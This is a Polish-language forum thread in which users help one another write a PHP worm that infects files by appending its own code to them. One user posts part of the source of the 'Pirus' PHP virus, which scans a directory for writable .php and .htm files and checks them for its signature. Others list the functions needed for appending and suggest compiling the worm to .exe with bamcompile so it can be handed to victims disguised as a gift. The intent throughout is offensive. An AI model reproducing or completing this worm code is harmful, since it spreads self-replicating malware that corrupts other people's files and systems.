php worm

[GSG-9]

szukalem ale nie moglem znalezc nic ciekawego:

czego uzyc, zeby worm 'chodzil' po roznych katalogach na dysku i dopisywal swoj calutki kod, do losowo znalezionych plikow?(chodzi o dopisywanie do konca pliku, czyli 'a' w funkcji fopen)

// a no i nie chodzi o webmastering, tylko skompilowany program

[gogulas]

opendir(), readdir(), fopen(a), fwrite(), fclose(), jakas petelka albo dwie i skrypt gotowy.

[VLN]

A w sumie to fajna sprawa . I na Windowsa i na Linuksa . Heh ja mam kod
Pirusa : dam kawałek

Kod php:

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[PIRUS.PHP]ÄÄÄ
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $infected=true;
  $executable=false;

 if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($executable = strstr ($file, '.php')) )
 if ( is_file($file) && is_writeable($file) )
 {
   $host = fopen($file, "r");
   $contents = fread ($host, filesize ($file));
   $sig = strstr ($contents, 'pirus.php');
   if(!$sig) $infected=false;
 }

PS. Chyba wszyscy znają moje dziwne hobby



Pozdrawiam VLN.

[GSG-9]

jak narazie, pomoc forumowa jest znacznie lepsza niz myslalem

[h3x]

strstr nie koniecznie sprawdza ciag 'od konca'.

worm w php... nieno, coraz lepiej.

[ironwall]

nie no php sie wogole nie nadaje do takich rzeczy po dziala po stronie serwera...co z tego ze napiszesz super wyrypistego worma i co z tego.......napiszesz gosciowi zeby sciagnął webserva zainstalował go i uruchomił skrypta.....bez sensu troche ;/

[GSG-9]

lol? kompilujesz do formatu *.exe i dajesz gosciowi w prezencie

[ironwall]

ok więc sory, przyznam że nie wiedziałem że tak można, myslalem ze trzeba miec jakis interpreter czy cuś.
na marginesie jeśli ktos bedzie chcial kompilować php do exe polecam program
http://www.bambalam.se/bamcompile/

[GSG-9]

bamcompile - wlasnie jego uzywam
prosty, mozliwosc dodawania dll'kow


no i juz mam glowny szkielet worma, teraz trza wymyslic jak zrobic funkcje poruszania sie po losowych katalogach